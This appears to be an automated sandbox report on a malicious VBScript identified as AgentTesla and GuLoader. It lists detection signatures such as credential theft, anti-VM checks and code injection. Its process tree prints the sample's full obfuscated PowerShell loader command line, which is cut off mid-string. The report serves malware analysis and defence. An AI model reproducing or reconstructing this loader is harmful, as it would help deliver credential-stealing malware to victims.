Windows Analysis Report
PONO6188.vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 500, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PONO6188.vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
- PING.EXE (PID: 1364, cmdline: ping google.com -n 1, MD5: 2F46799D79D22AC72C241EC0322B011D)
- conhost.exe (PID: 5828, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- PING.EXE (PID: 5500, cmdline: ping %.%.%.%, MD5: 2F46799D79D22AC72C241EC0322B011D)
- conhost.exe (PID: 5328, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 4016, cmdline: C:\Windows\system32\cmd.exe /c dir, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 736, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 4620, cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Dragonwo rt = 1;$Va d='Substri n';$Vad+=' g';Functio n Forfatte rskaberne( $Honnren){ $Naeppe=$H onnren.Len gth-$Drago nwort;For( $Tyndhudet =5; $Tyndh udet -lt $ Naeppe; $T yndhudet+= (6)){$Anti cipants+=$ Honnren.$V ad.Invoke( $Tyndhudet , $Dragonw ort);}$Ant icipants;} function F lelsessage rs167($bai tfish){. ($Statsl s) ($baitf ish);}$Non critical84 =Forfatter skaberne ' Ni.roM D m moGaasezBr andi N.dkl FrokolMerc aaSiv.n/En sw.5Glaci. Berm0Nrin g Teate(Ar ntpWKnicki DkninnPles sdDeducoRe petwmahons C vil Kilo wNP omoT,a dly Sejse1 Forlg0Klon d.Menya0Pa ata;Cosse SorteW C.r ei,urkin s ade6P,tel4 Stoni;Bysb a Lettex C no6 Folk4 Adhak;Fis, i weedrAab env Voks:C apan1Res z 2Nonpo1 Wi rd.Dront0H asse) Inte VauntGSti kle.evercV emodkErhve oNeogr/Pra ef2Forep0A dem1Val,i 0 Held0Tak t.1Nontr0R ,gne1slbsa ParagFJen viiClearrR igore rull fCircuoLid oxSymme/ Band1Amfib 2sho p1Min ds.L.est0T ude. ';$Sy stemgrafs= Forfatters kaberne 'E rnriU D sc s KunseA t iqrPolit-t javsA Spnd gtaxieeS.b venArabet Dece ';$Be white=Forf atterskabe rne 'Endan hWadmat Il lat annap Gyre:Delig / Unfl/B m banElbiliR ateft in e iDtrenoArk ol. .nurco rd.noResta mShoeb/ K, erk Supe2K omma/Brego UHandenWat erc ForwoP oindnshraf sPancrc.if fsiBrydne Convn.utsu tPulloiJom froUningu LodgsToolm n.etaleSpi lfsVittus Gunv.Conc. jSamvrp.nd dkbEndoc ' ;$Foelsomh ed=Forfatt erskaberne 'Extra>Al koh ';$Sta tsls=Forfa tterskaber ne 'Re,nui KandeHust .x.indu '; $Soil='Bur eaucratize s';Flelses sagers167 (Forfatter skaberne ' SuperSThro ue Bl atEn eka-Unde.C SavtaoBibl .n UbiqtRe dekeEnkeln ucert Lim e Has,e-fo rbuPkludra Advotmini mhSpl.t Mu .tiTNvnin: Kan.n\ omm eAIdeoln P ewet.jllei AbdietNedk uyDorsipBe clio Pissu BrystsImmo b.MelletAl actxB nzet Overp Misf o- CincV l upuaUltral Tre.muNum. 
eeUnive Ig n,t$ uskuS melano gle ri UndelSu me.; Na,u ');Flelses sagers167 (Forfatter skaberne ' MetafiMask if Sheo Sm aa(GerbrtR aneeeAcqui sNitritD.m me-Divisps tewaaShoop tAmt fhBut tl BoxinTB ioxa: Gr n \futurAEth ionKorrotL dervi Leng tStor,y,ar vepSyneroS mrreuKiwif sWebbe.Pap agtendowxm isfot Citr )Hoved{ Re dseDextrxt rachiTroch tDrnle}.ct or;Benda ' );$Plumipe de107 = Fo rfatterska berne ' Om steSqsamcT one.hLodli oProli Hvn en%snksmaU nexapDumst pRigsmdCo ntaRenipt FrigaHanke % Smil\ B. rdVKa.meeS e sur Uhe. eBranddHip poiMbirac Bildt.eget .Unprem Re giocoleouT roll S gte &Afkry&Mag ia F.odeNa tioc N.nph PulpioPrec o ulli$ De od ';Flels essagers16 7 (Forfatt erskaberne 'Coe o$In chag Asafl TriumoTret tbUngraa u rfl Alun:T haniHTab r eskar,aros arrSpaentG eot.gKontr r Vrt i Dy rseStoddfF akul=Dagge ( Te,ecJas pimSkat,dB